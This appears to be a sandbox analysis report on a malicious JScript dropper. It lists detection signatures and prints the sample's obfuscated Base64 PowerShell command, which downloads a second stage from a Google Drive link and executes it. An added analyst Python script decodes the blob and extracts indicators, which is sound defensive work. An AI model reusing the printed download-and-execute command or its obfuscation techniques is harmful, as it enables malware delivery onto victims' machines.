Windows
Analysis Report
ciuNW.js
Overview
General Information
Detection
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript source code contains functionality to generate code involving a shell, file or stream
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7412 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ciuNW.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 7468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACwAIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2AD
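Analyst's decoding of the Base64 argument in the powershell.exe command line above (an added example, not part of the sandbox report). The blob is handed to powershell.exe as a plain string literal in $Codigo, so PowerShell does not decode it at startup; the script decodes it itself later, which is what the FromBase64String and reversed-command signatures are reacting to. The Python below reproduces that step offline on the opening fragment of the blob exactly as the report prints it, extraction spaces included: it Base64-decodes, interprets the bytes as UTF-16LE (they come out as I.E.X., the same layout -EncodedCommand uses), collapses the 'a'+'b' literal splitting, and swaps the placeholder tokens back to the characters they stand in for. The T2H/Z4S/VGq mapping is inferred from where the tokens sit in the decoded text (T2H where a $ must be, Z4S where a quote must be, VGq between ToCharArray() and ForEach-Object), not read from the sample's own .Replace() calls, which fall beyond the truncated portion the report shows; treat that mapping as an assumption.

```python
"""Decode and partially deobfuscate the Base64 PowerShell argument from this report.

Added analyst tooling, not code from the report or the sample. The blob is decoded
here the way the sample eventually decodes it itself: Base64 -> UTF-16LE text.
"""
import base64
import re

# Opening fragment of the Base64 value copied from the report's process tree,
# including the spaces that text extraction inserted every ten characters.
# The report only shows a truncated prefix, so the decoded text stops mid-statement.
BLOB_PREFIX_AS_SHOWN = (
    "SQBFAFgAKA AgACgAKAAn AFQAMgBIAG kAbQBhAGcA ZQBVAHIAbA AgAD0AIABa "
    "ADQAUwBoAH QAdABwAHMA OgAvAC8AZA ByAGkAdgBl AC4AZwBvAG 8AZwBsAGUA "
    "LgBjAG8AbQ AvAHUAYwA/ AGUAeABwAG 8AcgB0AD0A ZABvAHcAbg BsAG8AYQBk "
    "ACYAaQBkAD 0AMQBBAEkA VgBnAEoASg BKAHYAMQBG ADYAdgBTAD QAcwBVAE8A "
    "eQBiAG4ASA AtAHMARAB2 AFUAJwArAC cAaABCAFkA dwB1AHIAIA BaADQAUwA7 "
    "AFQAMgBIAH cAZQBiAEMA bABpAGUAbg B0ACAAPQAg ACcAKwAnAE 4AZQB3AC0A "
    "TwBiAGoAZQ BjAHQAIABT AHkAcwB0AG UAbQAuAE4A ZQB0AC4AVw BlAGIAQwBs "
    "AGkAZQAnAC sAJwBuAHQA OwBUADIASA BpAG0AYQBn AGUAQgB5AH QAZQBzACAA "
    "PQAgAFQAMg AnACsAJwBI AHcAZQBiAE MAbABpAGUA bgB0AC4ARA BvAHcAbgBs "
    "AG8AYQBkAE QAYQB0AGEA KABUADIASA BpAG0AYQBn AGUAVQByAG wAKQA7AFQA"
)

# Token -> character mapping INFERRED from the decoded text (assumption, see lead-in):
# the sample's .Replace() calls that define it lie beyond the truncated blob.
PLACEHOLDERS = {"T2H": "$", "Z4S": "'", "VGq": "|"}


def decode_utf16_base64(blob: str) -> str:
    """Strip extraction whitespace, Base64-decode, interpret as UTF-16LE.

    A truncated prefix may end in an incomplete Base64 quantum or a half code
    unit; both are dropped rather than guessed at.
    """
    compact = re.sub(r"\s+", "", blob)
    compact = compact[: len(compact) - len(compact) % 4]
    raw = base64.b64decode(compact)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le")


def join_string_concatenations(script: str) -> str:
    """Collapse PowerShell literal concatenation ('abc'+'def' -> 'abcdef').

    Must run before placeholder substitution: the sample splits the placeholders
    themselves (T2'+'HwebClient), so substituting first would miss them.
    """
    return re.sub(r"'\s*\+\s*'", "", script)


def substitute_placeholders(script: str, mapping: dict = PLACEHOLDERS) -> str:
    """Swap each placeholder token for the character it stands in for."""
    for token, char in mapping.items():
        script = script.replace(token, char)
    return script


def deobfuscate(blob: str) -> str:
    """Full pipeline: Base64/UTF-16LE -> joined literals -> real characters."""
    return substitute_placeholders(join_string_concatenations(decode_utf16_base64(blob)))


def extract_urls(script: str) -> list:
    """Pull download URLs out of the recovered script for blocking/hunting."""
    return re.findall(r"https?://[^\s'\"]+", script)


if __name__ == "__main__":
    recovered = deobfuscate(BLOB_PREFIX_AS_SHOWN)
    print(recovered)
    print("download URL(s):", extract_urls(recovered))
```

Running it on the fragment yields the first statements of the second stage: a $imageUrl pointing at a Google Drive direct-download link, a System.Net.WebClient, and a DownloadData call, which is the "HTTP GET or POST without a user agent" behaviour the signatures list. The remainder of the blob, as far as the report prints it, goes on to cut a Base64 string out of the downloaded data between <<BASE64_START>> and <<BASE64_END>> markers and reverse it before FromBase64String, so the URL and those marker strings are the indicators worth pivoting on.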